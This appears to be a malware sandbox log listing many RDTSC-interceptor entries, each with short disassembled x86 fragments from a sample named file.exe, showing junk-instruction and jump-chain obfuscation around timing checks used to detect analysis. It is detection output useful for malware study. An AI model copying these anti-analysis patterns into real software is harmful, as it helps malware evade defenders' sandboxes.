Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4016B second address: 4C40192 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 2652F73Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FB1DCC289E5h 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40192 second address: 4C40198 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60BC0 second address: 4C60C33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB1DCC289DAh 0x00000009 xor ax, 3CD8h 0x0000000e jmp 00007FB1DCC289DBh 0x00000013 popfd 0x00000014 mov eax, 04F9B78Fh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [esp], ebp 0x0000001f jmp 00007FB1DCC289E2h 0x00000024 mov ebp, esp 0x00000026 pushad 0x00000027 movzx ecx, di 0x0000002a mov edx, 04B9E44Eh 0x0000002f popad 0x00000030 pop ebp 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007FB1DCC289DEh 0x0000003a add ecx, 1C7C8198h 0x00000040 jmp 00007FB1DCC289DBh 0x00000045 popfd 0x00000046 mov eax, 74790B4Fh 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60698 second address: 4C6069C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6069C second address: 4C606AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DCC289DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C605CB second address: 4C605DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB1DD32366Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C605DB second address: 4C6061B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FB1DCC289DAh 0x00000010 adc cl, FFFFFF98h 0x00000013 jmp 00007FB1DCC289DBh 0x00000018 popfd 0x00000019 mov eax, 3BA3004Fh 0x0000001e popad 0x0000001f mov dword ptr [esp], ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FB1DCC289E1h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C603BB second address: 4C603E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DD323679h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov si, bx 0x00000010 mov ch, bh 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C603E2 second address: 4C603F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB1DCC289DCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C603F2 second address: 4C603F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C701BA second address: 4C701F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DCC289E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FB1DCC289DEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB1DCC289DDh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C701F8 second address: 4C701FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C701FC second address: 4C70202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70202 second address: 4C70261 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DD32366Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FB1DD323670h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FB1DD32366Eh 0x00000018 or ecx, 3BE82B08h 0x0000001e jmp 00007FB1DD32366Bh 0x00000023 popfd 0x00000024 call 00007FB1DD323678h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70261 second address: 4C7026F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 pop ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov dx, ax 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80558 second address: 4C805E3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007FB1DD32366Ah 0x0000000f jmp 00007FB1DD323675h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FB1DD323670h 0x0000001b xor esi, 0FA42648h 0x00000021 jmp 00007FB1DD32366Bh 0x00000026 popfd 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a pushad 0x0000002b movzx eax, bx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushfd 0x00000031 jmp 00007FB1DD323677h 0x00000036 or al, 0000003Eh 0x00000039 jmp 00007FB1DD323679h 0x0000003e popfd 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C805E3 second address: 4C8063C instructions: 0x00000000 rdtsc 0x00000002 mov ax, 6487h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d call 00007FB1DCC289E8h 0x00000012 jmp 00007FB1DCC289E2h 0x00000017 pop eax 0x00000018 popad 0x00000019 and dword ptr [eax], 00000000h 0x0000001c jmp 00007FB1DCC289DCh 0x00000021 and dword ptr [eax+04h], 00000000h 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov di, 4FE0h 0x0000002c mov edx, 42528A0Ch 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8063C second address: 4C8064F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, eax 0x00000005 mov edx, eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop esi 0x00000010 mov bl, 9Dh 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8064F second address: 4C80655 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80655 second address: 4C80659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60519 second address: 4C6053D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DCC289E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6053D second address: 4C60557 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DD323676h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60557 second address: 4C60576 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 mov ecx, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB1DCC289E2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60576 second address: 4C6057C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6057C second address: 4C60580 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80098 second address: 4C800CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DD323679h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FB1DD32366Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov di, si 0x00000016 mov di, cx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C800CF second address: 4C80109 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 pushfd 0x00000007 jmp 00007FB1DCC289DCh 0x0000000c or si, FFD8h 0x00000011 jmp 00007FB1DCC289DBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov dh, 10h 0x00000020 jmp 00007FB1DCC289DCh 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80109 second address: 4C80131 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DD32366Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB1DD323675h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80131 second address: 4C80195 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB1DCC289E7h 0x00000009 jmp 00007FB1DCC289E3h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007FB1DCC289E8h 0x00000015 and eax, 23A24958h 0x0000001b jmp 00007FB1DCC289DBh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 pop ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80195 second address: 4C80199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80199 second address: 4C801B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DCC289E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C801B4 second address: 4C801BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C801BA second address: 4C801BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C801BE second address: 4C801C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA0728 second address: 4CA072C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA072C second address: 4CA0730 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA0730 second address: 4CA0736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA0736 second address: 4CA0777 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, E6h 0x00000005 mov si, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FB1DD323676h 0x00000011 mov dword ptr [esp], ebp 0x00000014 jmp 00007FB1DD323670h 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov edi, 2A149FF0h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA0777 second address: 4CA077C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA077C second address: 4CA078B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB1DD32366Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA078B second address: 4CA07E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DCC289E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c jmp 00007FB1DCC289DEh 0x00000011 push eax 0x00000012 pushad 0x00000013 mov bh, E0h 0x00000015 jmp 00007FB1DCC289DAh 0x0000001a popad 0x0000001b xchg eax, ecx 0x0000001c pushad 0x0000001d jmp 00007FB1DCC289DEh 0x00000022 mov edx, eax 0x00000024 popad 0x00000025 mov eax, dword ptr [76FA65FCh] 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA07E6 second address: 4CA07EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA07EA second address: 4CA0803 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DCC289E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA0803 second address: 4CA0890 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DD323671h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FB1DD323673h 0x00000012 or eax, 431C32CEh 0x00000018 jmp 00007FB1DD323679h 0x0000001d popfd 0x0000001e popad 0x0000001f je 00007FB24F5A677Ch 0x00000025 pushad 0x00000026 mov esi, 1FE51773h 0x0000002b pushfd 0x0000002c jmp 00007FB1DD323678h 0x00000031 or esi, 64DF6678h 0x00000037 jmp 00007FB1DD32366Bh 0x0000003c popfd 0x0000003d popad 0x0000003e mov ecx, eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA0890 second address: 4CA0894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA0894 second address: 4CA08AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DD323677h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA08AF second address: 4CA097A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DCC289E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d pushad 0x0000000e mov edi, 7CBD484Eh 0x00000013 mov dx, 9B5Ah 0x00000017 popad 0x00000018 pushfd 0x00000019 jmp 00007FB1DCC289DBh 0x0000001e xor cl, FFFFFFFEh 0x00000021 jmp 00007FB1DCC289E9h 0x00000026 popfd 0x00000027 popad 0x00000028 and ecx, 1Fh 0x0000002b jmp 00007FB1DCC289DEh 0x00000030 ror eax, cl 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007FB1DCC289DEh 0x00000039 xor ah, 00000028h 0x0000003c jmp 00007FB1DCC289DBh 0x00000041 popfd 0x00000042 mov ax, 841Fh 0x00000046 popad 0x00000047 leave 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b mov edi, 50F5D422h 0x00000050 pushfd 0x00000051 jmp 00007FB1DCC289E3h 0x00000056 sbb eax, 6348711Eh 0x0000005c jmp 00007FB1DCC289E9h 0x00000061 popfd 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA097A second address: 4CA0980 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA0980 second address: 4CA0984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA0984 second address: 4CA0997 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c mov esi, eax 0x0000000e lea eax, dword ptr [ebp-08h] 0x00000011 xor esi, dword ptr [00DD2014h] 0x00000017 push eax 0x00000018 push eax 0x00000019 push eax 0x0000001a lea eax, dword ptr [ebp-10h] 0x0000001d push eax 0x0000001e call 00007FB1E1233F35h 0x00000023 push FFFFFFFEh 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA0997 second address: 4CA099B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA099B second address: 4CA09AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DD32366Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA09AB second address: 4CA09B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5005A second address: 4C5007E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DD323679h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5007E second address: 4C50082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50082 second address: 4C50088 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50088 second address: 4C500D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 mov ax, 9973h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f mov ax, C3EBh 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushfd 0x00000017 jmp 00007FB1DCC289DCh 0x0000001c or esi, 3D168078h 0x00000022 jmp 00007FB1DCC289DBh 0x00000027 popfd 0x00000028 popad 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FB1DCC289E5h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C500D8 second address: 4C50153 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB1DD323677h 0x00000009 sbb esi, 79B1259Eh 0x0000000f jmp 00007FB1DD323679h 0x00000014 popfd 0x00000015 movzx esi, di 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b and esp, FFFFFFF8h 0x0000001e jmp 00007FB1DD323673h 0x00000023 xchg eax, ecx 0x00000024 pushad 0x00000025 mov bx, si 0x00000028 mov dx, cx 0x0000002b popad 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FB1DD323678h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50153 second address: 4C501C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DCC289DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b call 00007FB1DCC289E4h 0x00000010 mov dx, ax 0x00000013 pop eax 0x00000014 mov edx, 631553D2h 0x00000019 popad 0x0000001a push ebx 0x0000001b jmp 00007FB1DCC289E6h 0x00000020 mov dword ptr [esp], ebx 0x00000023 jmp 00007FB1DCC289E0h 0x00000028 mov ebx, dword ptr [ebp+10h] 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FB1DCC289E7h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C501C8 second address: 4C50254 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DD323679h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov ecx, 083ED043h 0x00000010 mov dl, ah 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 pushad 0x00000016 call 00007FB1DD32366Eh 0x0000001b pop ecx 0x0000001c push ebx 0x0000001d pop ecx 0x0000001e popad 0x0000001f mov di, B152h 0x00000023 popad 0x00000024 xchg eax, esi 0x00000025 pushad 0x00000026 jmp 00007FB1DD32366Fh 0x0000002b mov edx, ecx 0x0000002d popad 0x0000002e mov esi, dword ptr [ebp+08h] 0x00000031 jmp 00007FB1DD323672h 0x00000036 xchg eax, edi 0x00000037 jmp 00007FB1DD323670h 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FB1DD32366Eh 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50254 second address: 4C502D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DCC289DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b mov cl, 72h 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 popad 0x00000012 test esi, esi 0x00000014 jmp 00007FB1DCC289E9h 0x00000019 je 00007FB24EEF6D64h 0x0000001f jmp 00007FB1DCC289DEh 0x00000024 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002b jmp 00007FB1DCC289E0h 0x00000030 je 00007FB24EEF6D4Fh 0x00000036 jmp 00007FB1DCC289E0h 0x0000003b mov edx, dword ptr [esi+44h] 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C502D1 second address: 4C502D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C502D7 second address: 4C503D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB1DCC289E2h 0x00000009 or cx, A678h 0x0000000e jmp 00007FB1DCC289DBh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FB1DCC289E8h 0x0000001a adc ax, C0D8h 0x0000001f jmp 00007FB1DCC289DBh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 or edx, dword ptr [ebp+0Ch] 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FB1DCC289E4h 0x00000032 add cl, 00000038h 0x00000035 jmp 00007FB1DCC289DBh 0x0000003a popfd 0x0000003b pushad 0x0000003c call 00007FB1DCC289E6h 0x00000041 pop eax 0x00000042 pushfd 0x00000043 jmp 00007FB1DCC289DBh 0x00000048 sub cx, 45AEh 0x0000004d jmp 00007FB1DCC289E9h 0x00000052 popfd 0x00000053 popad 0x00000054 popad 0x00000055 test edx, 61000000h 0x0000005b jmp 00007FB1DCC289DEh 0x00000060 jne 00007FB24EEF6CB2h 0x00000066 jmp 00007FB1DCC289E0h 0x0000006b test byte ptr [esi+48h], 00000001h 0x0000006f push eax 0x00000070 push edx 0x00000071 push eax 0x00000072 push edx 0x00000073 jmp 00007FB1DCC289DAh 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C503D4 second address: 4C503D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C503D8 second address: 4C503DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C503DE second address: 4C503E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C503E4 second address: 4C503E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C503E8 second address: 4C503EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C408D2 second address: 4C408D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C408D9 second address: 4C40904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 jmp 00007FB1DD323674h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB1DD32366Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40904 second address: 4C40913 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DCC289DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
